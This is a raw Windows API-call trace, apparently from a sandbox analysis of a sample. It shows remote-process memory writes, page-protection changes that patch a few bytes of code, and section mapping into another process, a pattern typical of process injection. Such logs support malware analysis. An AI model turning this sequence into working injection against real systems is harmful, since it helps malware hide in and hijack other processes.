	[0070.558] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x50002b, lpBuffer=0x2d0fe3f*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe3f*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.559] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x50002c, lpBuffer=0x2d0fe40*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe40*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.559] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x50002d, lpBuffer=0x2d0fe41*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe41*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.559] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x50002e, lpBuffer=0x2d0fe42*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe42*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.559] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x50002f, lpBuffer=0x2d0fe43*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe43*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.560] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500030, lpBuffer=0x2d0fe44*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe44*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.560] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500031, lpBuffer=0x2d0fe45*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe45*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.560] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500032, lpBuffer=0x2d0fe46*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe46*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.560] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500033, lpBuffer=0x2d0fe47*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe47*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.560] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500034, lpBuffer=0x2d0fe48*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe48*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.561] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500035, lpBuffer=0x2d0fe49*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe49*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.561] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500036, lpBuffer=0x2d0fe4a*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe4a*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.561] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500037, lpBuffer=0x2d0fe4b*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe4b*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.561] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500038, lpBuffer=0x2d0fe64*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe64*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.562] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x500039, lpBuffer=0x2d0fe65*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe65*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.562] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x50003a, lpBuffer=0x2d0fe66*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe66*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.562] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x50003b, lpBuffer=0x2d0fe67*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe67*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.562] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x50003c, lpBuffer=0x2d0fe68*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe68*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.563] VirtualProtectEx (in: hProcess=0x224, lpAddress=0x7782d9b0, dwSize=0x400, flNewProtect=0x40, lpflOldProtect=0x2d0fec4 | out: lpflOldProtect=0x2d0fec4*=0x20) returned 1
	[0070.563] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x7782d9b0, lpBuffer=0x2d0fe64*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe64*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.563] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x7782d9b1, lpBuffer=0x2d0fe65*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe65*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.563] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x7782d9b2, lpBuffer=0x2d0fe66*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe66*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.564] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x7782d9b3, lpBuffer=0x2d0fe67*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe67*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.564] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x7782d9b4, lpBuffer=0x2d0fe68*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe68*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.564] VirtualProtectEx (in: hProcess=0x224, lpAddress=0x7782d9b0, dwSize=0x400, flNewProtect=0x20, lpflOldProtect=0x2d0fec4 | out: lpflOldProtect=0x2d0fec4*=0x40) returned 1
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.565] GetLastError () returned 0x0
	[0070.566] GetLastError () returned 0x0
	[0070.566] GetLastError () returned 0x0
	[0070.566] GetLastError () returned 0x0
	[0070.566] GetLastError () returned 0x0
	[0070.566] GetLastError () returned 0x0
	[0070.566] GetLastError () returned 0x0
	[0070.566] GetLastError () returned 0x0
	[0070.566] GetLastError () returned 0x0
	[0070.566] GetLastError () returned 0x0
	[0070.566] GetLastError () returned 0x0
	[0070.566] GetLastError () returned 0x0
	[0070.566] GetLastError () returned 0x0
	[0070.566] GetLastError () returned 0x0
	[0070.566] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77960000
	[0070.566] GetProcAddress (hModule=0x77960000, lpProcName="NtUnmapViewOfSection") returned 0x779d6f40
	[0070.566] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x2bb0000) returned 0x0
	[0070.567] GetLastError () returned 0x0
	[0070.567] GetLastError () returned 0x0
	[0070.567] GetLastError () returned 0x0
	[0070.567] GetLastError () returned 0x0
	[0070.567] GetLastError () returned 0x0
	[0070.567] GetLastError () returned 0x0
	[0070.567] GetLastError () returned 0x0
	[0070.567] GetLastError () returned 0x0
	[0070.567] GetLastError () returned 0x0
	[0070.567] GetLastError () returned 0x0
	[0070.567] GetLastError () returned 0x0
	[0070.567] GetLastError () returned 0x0
	[0070.567] GetLastError () returned 0x0
	[0070.567] GetLastError () returned 0x0
	[0070.567] GetLastError () returned 0x0
	[0070.567] GetLastError () returned 0x0
	[0070.567] GetLastError () returned 0x0
	[0070.567] GetLastError () returned 0x0
	[0070.567] GetLastError () returned 0x0
	[0070.567] GetLastError () returned 0x0
	[0070.567] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetLastError () returned 0x0
	[0070.568] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0070.568] GetProcAddress (hModule=0x77960000, lpProcName="RtlNtStatusToDosError") returned 0x779b83c0
	[0070.568] RtlNtStatusToDosError (Status=0x0) returned 0x0
	[0070.568] CloseHandle (hObject=0x220) returned 1
	[0070.569] Sleep (dwMilliseconds=0x64) 
	[0070.702] GetVersion () returned 0x23f00206
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.702] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0070.703] GetProcAddress (hModule=0x77960000, lpProcName="NtCreateSection") returned 0x779d7140
	[0070.703] NtCreateSection (in: SectionHandle=0x2d0fec4, DesiredAccess=0xf001f, ObjectAttributes=0x2d0fe50*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), MaximumSize=0x2d0fe8c, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2d0fec4*=0x220) returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.703] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetLastError () returned 0x0
	[0070.704] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0070.705] GetProcAddress (hModule=0x77960000, lpProcName="NtMapViewOfSection") returned 0x779d6f20
	[0070.705] NtMapViewOfSection (in: SectionHandle=0x220, ProcessHandle=0xffffffff, BaseAddress=0x2d0febc*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x2d0fdf8*=0, ViewSize=0x2d0fe1c*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2d0febc*=0x2bb0000, SectionOffset=0x2d0fdf8*=0, ViewSize=0x2d0fe1c*=0x18000) returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.705] GetLastError () returned 0x0
	[0070.706] GetLastError () returned 0x0
	[0070.706] GetLastError () returned 0x0
	[0070.706] GetLastError () returned 0x0
	[0070.706] GetLastError () returned 0x0
	[0070.706] GetLastError () returned 0x0
	[0070.706] GetLastError () returned 0x0
	[0070.706] GetLastError () returned 0x0
	[0070.706] GetLastError () returned 0x0
	[0070.706] GetLastError () returned 0x0
	[0070.706] GetLastError () returned 0x0
	[0070.706] GetLastError () returned 0x0
	[0070.706] GetLastError () returned 0x0
	[0070.706] GetLastError () returned 0x0
	[0070.706] GetLastError () returned 0x0
	[0070.706] GetLastError () returned 0x0
	[0070.706] GetLastError () returned 0x0
	[0070.706] GetLastError () returned 0x0
	[0070.706] GetLastError () returned 0x0
	[0070.706] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0070.706] GetProcAddress (hModule=0x77960000, lpProcName="RtlNtStatusToDosError") returned 0x779b83c0
	[0070.706] RtlNtStatusToDosError (Status=0x0) returned 0x0
	[0070.707] GetLastError () returned 0x0
	[0070.707] GetLastError () returned 0x0
	[0070.707] GetLastError () returned 0x0
	[0070.707] GetLastError () returned 0x0
	[0070.707] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetLastError () returned 0x0
	[0070.708] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0070.709] GetProcAddress (hModule=0x77960000, lpProcName="NtMapViewOfSection") returned 0x779d6f20
	[0070.709] NtMapViewOfSection (in: SectionHandle=0x220, ProcessHandle=0x224, BaseAddress=0x2d0ff18*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x2d0fe94*=0, ViewSize=0x2d0feb8*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2d0ff18*=0x520000, SectionOffset=0x2d0fe94*=0, ViewSize=0x2d0feb8*=0x18000) returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.709] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetLastError () returned 0x0
	[0070.710] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0070.710] GetProcAddress (hModule=0x77960000, lpProcName="RtlNtStatusToDosError") returned 0x779b83c0
	[0070.710] RtlNtStatusToDosError (Status=0x0) returned 0x0
	[0070.710] VirtualAllocEx (hProcess=0x224, lpAddress=0x0, dwSize=0x38, flAllocationType=0x3000, flProtect=0x20) returned 0x700000
	[0070.711] VirtualAllocEx (hProcess=0x224, lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x20) returned 0x710000
	[0070.711] VirtualProtectEx (in: hProcess=0x224, lpAddress=0x710000, dwSize=0x5, flNewProtect=0x40, lpflOldProtect=0x2d0fec4 | out: lpflOldProtect=0x2d0fec4*=0x20) returned 1
	[0070.711] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x710000, lpBuffer=0x2d0fe64*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe64*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.711] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x710001, lpBuffer=0x2d0fe65*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe65*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.711] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x710002, lpBuffer=0x2d0fe66*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe66*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.712] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x710003, lpBuffer=0x2d0fe67*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe67*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.712] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x710004, lpBuffer=0x2d0fe68*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe68*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.712] VirtualProtectEx (in: hProcess=0x224, lpAddress=0x710000, dwSize=0x5, flNewProtect=0x20, lpflOldProtect=0x2d0fec4 | out: lpflOldProtect=0x2d0fec4*=0x40) returned 1
	[0070.712] VirtualProtectEx (in: hProcess=0x224, lpAddress=0x700000, dwSize=0x3d, flNewProtect=0x40, lpflOldProtect=0x2d0fec4 | out: lpflOldProtect=0x2d0fec4*=0x20) returned 1
	[0070.712] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700000, lpBuffer=0x2d0fe14*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe14*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.712] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700001, lpBuffer=0x2d0fe15*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe15*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.713] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700002, lpBuffer=0x2d0fe16*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe16*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.713] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700003, lpBuffer=0x2d0fe17*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe17*, lpNumberOfBytesWritten=0x0) returned 1
	[0070.713] WriteProcessMemory (in: hProcess=0x224, lpBaseAddress=0x700004, lpBuffer=0x2d0fe18*, nSize=0x1, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x2d0fe18*, lpNumberOfBytesWritten=0x0) returned 1
